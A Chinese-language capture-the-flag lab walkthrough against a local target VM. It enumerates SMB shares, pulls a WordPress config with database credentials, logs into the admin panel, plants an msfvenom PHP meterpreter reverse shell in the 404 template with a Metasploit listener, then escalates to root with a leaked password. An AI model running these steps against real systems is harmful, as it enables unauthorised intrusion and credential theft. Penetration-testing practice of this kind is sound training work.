SMB信息泄露

SMB信息泄露

1.确保攻击机和靶机处在同局域网/ 首先使用ifconfig命令查看本机IP地址

2.使用 nmap -sn -PE 192.168.56.0/24命令然后扫出靶机IP：192.168.56.103

3.使用nmap -sV 192.168.56.103 命令扫描靶机开放的服务端口

我们发现目标靶机有22，80，139，445，3306,6667 几个可能有用的端口开放，其中139和445进行的SMB服务

其中，使用计算机名访问时，SMB服务工作在NetBIOS协议之上，用的是TCP的139端口；使用IP地址访问时，用的是TCP的445端口。

针对SMB协议弱点分析

4.针对SMB协议，使用空口令，若口令尝试登陆，并查看敏感文件，下载查看：

smbclient -L IP           //查看SMB文件目录
smbclient '\\IP\$share'   //查看SMB文件
get 敏感文件               //下载文件

5.针对SMB协议远程溢出漏洞进行分析

searchsploit samba版本号 //搜索smb远程溢出漏洞

6.使用命令： smbclient -L 192.168.56.103尝试空口令登录

7.使用命令：smbclient '\\192.168.56.103\share$' 空命令进入查看目录

8. 注意本目录下的deets.txt和wordpress目录下的wp-config.php ，这里将其下载到kali上

9. 打开deets.txt文件，找到一个密码信息：12345 也许有用

10.打开 wp-config.php文件，里面存有数据库的一些配置信息，我们找到数据库的账号密码。

使用命令：searchsploit samba版本号 尝试搜索存在的漏洞 发现不存在

---

深度挖掘

针对HTTP协议弱点分析
1.浏览器查看网站
2.使用dirb或nikto探测
3.寻找突破点，目标登陆后台，上传webshell

dirb http://192.168.56.103     //查看靶机目录

1.发现可疑目录，尝试浏览器打开

2.使用刚才 wp-config.php文件中的用户 密码 发现成功登录

3.我们进入了后台之后，在kali制作webshell 使用如下命令

 msfvenom -p php/meterpreter/reverse_tcp lhost= 本机IP lport=4444 -f raw

将制作好的webshell保存在桌面，以便使用

4. 启动metasploit，然后启动监听：

msfconsole                           //启动metasploit
msf > use exploit/multi/handler      //调用模块
msf exploit(handler) > set payload php/meterpreter/reverse_tcp    
msf exploit(handler) > set lhost kali机IP
msf exploit(handler) > set lport 4444           //端口
msf exploit(handler) > run

5.kali正在监听4444端口，接下来，我们上传webshell。打开火狐浏览器，进入后台页面,将404模板跟换为改成的webshell

6.接下来进入kali 发现监听成功 然后进入shell，发现用户权限不够，于是想到提权

python -c "import pty;pty.spawn('/bin/bash')"       #美化shell改成终端模式

7.使用命令 cat /etc/passwd查看用户信息,发现home目录下存在togie用户

cat  /etc/passwd
landscape:x:103:109::/var/lib/landscape:/bin/false
togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

8. 我们切换成该用户，使用deets.txt的密码12345，成功切换

9.尝试切换root用户，进入root目录

10.cd到root目录，看到有proof.txt文件，打开文件拿到flag